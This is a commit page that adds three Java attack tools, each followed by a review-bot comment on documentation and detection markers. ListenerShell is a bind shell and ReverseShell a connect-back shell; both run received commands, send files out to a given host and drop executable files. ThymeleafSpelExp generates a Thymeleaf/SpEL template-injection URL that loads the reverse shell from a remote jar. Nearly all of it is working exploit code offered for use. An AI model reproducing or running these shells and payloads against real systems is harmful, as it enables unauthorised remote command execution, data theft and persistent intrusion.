
Commit 78e87fb

author
threedr3am
committed
feat common
1. 添加两个常用shell 2. thymeleaf利用generator
1 parent 73e8975 commit 78e87fb


3 files changed

+281
-0
lines changed

Lines changed: 110 additions & 0 deletions
@@ -0,0 +1,110 @@
1+
import java.io.BufferedReader;
2+
import java.io.BufferedWriter;
3+
import java.io.File;
4+
import java.io.IOException;
5+
import java.io.InputStream;
6+
import java.io.InputStreamReader;
7+
import java.io.OutputStreamWriter;
8+
import java.net.ServerSocket;
9+
import java.net.Socket;
10+
import java.nio.file.Files;
11+
import java.nio.file.Path;
12+
import java.nio.file.Paths;
13+
14+
/**
15+
* @author threedr3am
16+
*/
17+
public class ListenerShell implements Runnable {
18+
19+
private String port;
20+
21+
public ListenerShell(String port) {
22+
this.port = port;
23+
new Thread(this).start();
24+
}
25+
26+
@Override
27+
public void run() {
28+
try {
29+
ServerSocket serverSocket = new ServerSocket(Integer.parseInt(port));
30+
Socket socket = serverSocket.accept();
31+
BufferedWriter bufferedWriter = new BufferedWriter(
32+
new OutputStreamWriter(socket.getOutputStream()));
33+
bufferedWriter.write("success!");
34+
bufferedWriter.newLine();
35+
bufferedWriter.flush();
36+
37+
BufferedReader bufferedReader = new BufferedReader(
38+
new InputStreamReader(socket.getInputStream()));
39+
40+
while (true) {
41+
String line = bufferedReader.readLine();
42+
if (line.equals("exit"))
43+
return;
44+
Process pro = null;
45+
try {
46+
if (line.startsWith("${IFS}")) {
47+
line = line.substring(6);
48+
String[] cmd = line.split("\\$\\{IFS\\}");
49+
pro = Runtime.getRuntime().exec(cmd);
50+
} else if (line.startsWith("download")) {
51+
line = line.substring(8).trim();
52+
String[] cmd = line.split(" ");
53+
String file = cmd[0];
54+
String ip = cmd[1];
55+
String port = cmd[2];
56+
byte[] bytes = Files.readAllBytes(Paths.get(file));
57+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
58+
transferFileSocket.getOutputStream().write(bytes);
59+
transferFileSocket.getOutputStream().flush();
60+
transferFileSocket.getOutputStream().close();
61+
transferFileSocket.close();
62+
} else if (line.startsWith("upload")) {
63+
line = line.substring(6).trim();
64+
String[] cmd = line.split(" ");
65+
String file = cmd[0];
66+
String ip = cmd[1];
67+
String port = cmd[2];
68+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
69+
InputStream inputStream = transferFileSocket.getInputStream();
70+
Path path = Paths.get(file);
71+
Files.copy(inputStream, path);
72+
if (Files.exists(path)) {
73+
File toSetFile = path.toFile();
74+
toSetFile.setExecutable(true);
75+
toSetFile.setReadable(true);
76+
toSetFile.setWritable(true);
77+
}
78+
inputStream.close();
79+
transferFileSocket.close();
80+
} else {
81+
pro = Runtime.getRuntime().exec(line);
82+
}
83+
} catch (Exception e) {
84+
bufferedWriter.write(e.getMessage());
85+
bufferedWriter.newLine();
86+
bufferedWriter.flush();
87+
}
88+
BufferedReader bufferedReader2 = new BufferedReader(new InputStreamReader(pro.getInputStream()));
89+
StringBuilder stringBuilder2 = new StringBuilder();
90+
String line2;
91+
while ((line2 = bufferedReader2.readLine()) != null) {
92+
stringBuilder2.append(line2).append("\n");
93+
}
94+
bufferedWriter.write(stringBuilder2.toString());
95+
bufferedWriter.newLine();
96+
bufferedWriter.flush();
97+
}
98+
} catch (IOException e) {
99+
}
100+
}
101+
102+
public static void main(String[] args) throws Exception {
103+
// InputStream inputStream = ReverseShell.class.getResourceAsStream("ListenerShell.class");
104+
// byte[] bytes = new byte[inputStream.available()];
105+
// inputStream.read(bytes);
106+
// String code = Utility.encode(bytes, true);
107+
// System.out.println("$$BCEL$$" + code);
108+
new ListenerShell(args[0]);
109+
}
110+
}
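Review bot: The class comment holds only `@author`, so nothing records that constructing `ListenerShell` immediately starts a thread which binds `new ServerSocket(Integer.parseInt(port))` and passes every line received from the first client to `Runtime.getRuntime().exec` without any authentication. I would state that in the Javadoc, for example `/** Bind-shell payload: listens on {@code port} and executes each received line via Runtime.exec; no authentication. */`, so the file is recognisable in code search and scanner triage. The outer `catch (IOException e) { }` is empty and neither `serverSocket` nor `socket` is ever closed, so failures leave no trace and the sockets are released only when the JVM collects them or exits. For detection, the behaviour visible here is a Java process that listens on a TCP port, spawns child processes, and in the `upload` branch writes a file and calls `setExecutable(true)` on it.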
Lines changed: 127 additions & 0 deletions
@@ -0,0 +1,127 @@
1+
import com.sun.org.apache.bcel.internal.classfile.Utility;
2+
import java.io.BufferedReader;
3+
import java.io.BufferedWriter;
4+
import java.io.File;
5+
import java.io.IOException;
6+
import java.io.InputStream;
7+
import java.io.InputStreamReader;
8+
import java.io.OutputStream;
9+
import java.io.OutputStreamWriter;
10+
import java.net.Socket;
11+
import java.nio.file.Files;
12+
import java.nio.file.Path;
13+
import java.nio.file.Paths;
14+
import java.util.Base64;
15+
16+
public class ReverseShell implements Runnable {
17+
18+
private String ip;
19+
private Integer port;
20+
21+
private InputStream inputStream;
22+
private OutputStream outputStream;
23+
24+
public ReverseShell(String ip, Integer port) {
25+
this.ip = ip;
26+
this.port = port;
27+
new Thread(this).start();
28+
}
29+
30+
public ReverseShell(InputStream inputStream, OutputStream outputStream) {
31+
this.inputStream = inputStream;
32+
this.outputStream = outputStream;
33+
new Thread(this).start();
34+
}
35+
36+
@Override
37+
public void run() {
38+
if (outputStream != null && inputStream != null) {
39+
try {
40+
BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream));
41+
BufferedReader read = new BufferedReader(new InputStreamReader(inputStream));
42+
String line2;
43+
while ((line2 = read.readLine()) != null) {
44+
bufferedWriter.write(line2);
45+
bufferedWriter.newLine();
46+
bufferedWriter.flush();
47+
}
48+
} catch (Exception e) {}
49+
} else {
50+
try {
51+
Socket socket = new Socket(ip, port);
52+
BufferedWriter bufferedWriter = new BufferedWriter(
53+
new OutputStreamWriter(socket.getOutputStream()));
54+
bufferedWriter.write("success!");
55+
bufferedWriter.newLine();
56+
bufferedWriter.flush();
57+
58+
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(socket.getInputStream()));
59+
while (true) {
60+
String line = bufferedReader.readLine();
61+
if (line.equals("exit"))
62+
return;
63+
Process pro = null;
64+
try {
65+
if (line.startsWith("${IFS}")) {
66+
line = line.substring(6);
67+
String[] cmd = line.split("\\$\\{IFS\\}");
68+
pro = Runtime.getRuntime().exec(cmd);
69+
} else if (line.startsWith("download")) {
70+
line = line.substring(8).trim();
71+
String[] cmd = line.split(" ");
72+
String file = cmd[0];
73+
String ip = cmd[1];
74+
String port = cmd[2];
75+
byte[] bytes = Files.readAllBytes(Paths.get(file));
76+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
77+
transferFileSocket.getOutputStream().write(bytes);
78+
transferFileSocket.getOutputStream().flush();
79+
transferFileSocket.getOutputStream().close();
80+
transferFileSocket.close();
81+
} else if (line.startsWith("upload")) {
82+
line = line.substring(6).trim();
83+
String[] cmd = line.split(" ");
84+
String file = cmd[0];
85+
String ip = cmd[1];
86+
String port = cmd[2];
87+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
88+
InputStream inputStream = transferFileSocket.getInputStream();
89+
Path path = Paths.get(file);
90+
Files.copy(inputStream, path);
91+
if (Files.exists(path)) {
92+
File toSetFile = path.toFile();
93+
toSetFile.setExecutable(true);
94+
toSetFile.setReadable(true);
95+
toSetFile.setWritable(true);
96+
}
97+
inputStream.close();
98+
transferFileSocket.close();
99+
} else {
100+
pro = Runtime.getRuntime().exec(line);
101+
}
102+
} catch (Exception e) {
103+
bufferedWriter.write(e.getMessage());
104+
bufferedWriter.newLine();
105+
bufferedWriter.flush();
106+
}
107+
if (pro == null) {
108+
continue;
109+
}
110+
111+
new ReverseShell(pro.getInputStream(), socket.getOutputStream());
112+
new ReverseShell(pro.getErrorStream(), socket.getOutputStream());
113+
}
114+
115+
} catch (IOException e) {}
116+
}
117+
}
118+
119+
public static void main(String[] args) throws Exception {
120+
InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class");
121+
byte[] bytes = new byte[inputStream.available()];
122+
inputStream.read(bytes);
123+
String code = Utility.encode(bytes, true);
124+
System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes()));
125+
// new ReverseShell("127.0.0.1", 12345);
126+
}
127+
}
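Review bot: `ReverseShell` has no class comment, and its two constructors put the object into two unrelated modes that `run()` tells apart only by `outputStream != null && inputStream != null`: one connects out to `ip`/`port` and executes received lines with `Runtime.getRuntime().exec`, the other only copies a process stream to the socket. A Javadoc on the class and on each constructor saying which mode it selects would make that readable, e.g. `/** Connect-back payload: dials ip:port and executes each received line. */` and `/** Stream pump that forwards process output to the socket. */`. `main` depends on the JDK-internal `com.sun.org.apache.bcel.internal.classfile.Utility`, which deserves a comment because it is not a supported API. On the defensive side, `main` prints the Base64 form of a string starting with `$$BCEL$$`, so that literal (Base64 prefix `JCRCQ0VMJC`) in request data or logs is a useful match for BCEL class-loader payloads built this way.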
Lines changed: 44 additions & 0 deletions
@@ -0,0 +1,44 @@
1+
import java.util.Scanner;
2+
3+
/**
4+
* @author threedr3am
5+
*/
6+
public class ThymeleafSpelExp {
7+
public static void main(String[] args) {
8+
Scanner scanner = new Scanner(System.in);
9+
System.out.println("请输入目标URL:");
10+
String host = scanner.nextLine();
11+
System.out.println("请输入下载jar地址:");
12+
String jarUrl = scanner.nextLine();
13+
System.out.println("请输入反弹shell接收ip:");
14+
String ip = scanner.nextLine();
15+
System.out.println("请输入反弹shell接收port:");
16+
int port = Integer.parseInt(scanner.nextLine());
17+
18+
StringBuilder spelBuilder = new StringBuilder()
19+
.append("__${new java.net.URLClassLoader(new java.net.URL%5B%5D{new java.net.URL(T(String).valueOf(new char%5B%5D {")
20+
.append(stringToBytesStr(jarUrl))
21+
.append("}))}).loadClass(T(String).valueOf(new char%5B%5D{")
22+
.append(stringToBytesStr("ReverseShell"))
23+
.append("})).getConstructor(T(String), T(Integer)).newInstance(T(String).valueOf(new char%5B%5D {")
24+
.append(stringToBytesStr(ip))
25+
.append("}), ")
26+
.append(port)
27+
.append(").toString()}__::.x")
28+
;
29+
String spel = spelBuilder.toString();
30+
System.out.println("SPEL:");
31+
System.out.println(host+"/"+spel);
32+
}
33+
34+
private static String stringToBytesStr(String string) {
35+
StringBuilder stringBuilder = new StringBuilder();
36+
for (int i = 0; i < string.length(); i++) {
37+
stringBuilder.append(String.format("%d", (byte)string.charAt(i)));
38+
if (string.length() - 1 != i) {
39+
stringBuilder.append(",");
40+
}
41+
}
42+
return stringBuilder.toString();
43+
}
44+
}
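Review bot: `main` has no comment explaining what the printed string is: a URL whose path is a Thymeleaf preprocessing expression of the form `__${...}__::.x` that loads the `ReverseShell` class from `jarUrl` through `java.net.URLClassLoader`; the page also does not say which application or version it is written against. A short header comment stating that, plus a note on `stringToBytesStr` that it emits decimal char codes and that the `(byte)` cast does not preserve characters above 127, would document both methods. Because the jar URL, class name and IP are emitted as `T(String).valueOf(new char%5B%5D{...})` rather than as literals, request filters that look for URLs or class names will not match; the stable markers visible here are `__${`, `}__::` and `T(` in the request path. The usual application-side mitigation for this class of injection is to keep request-derived text out of the values returned as view names or fragment expressions.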
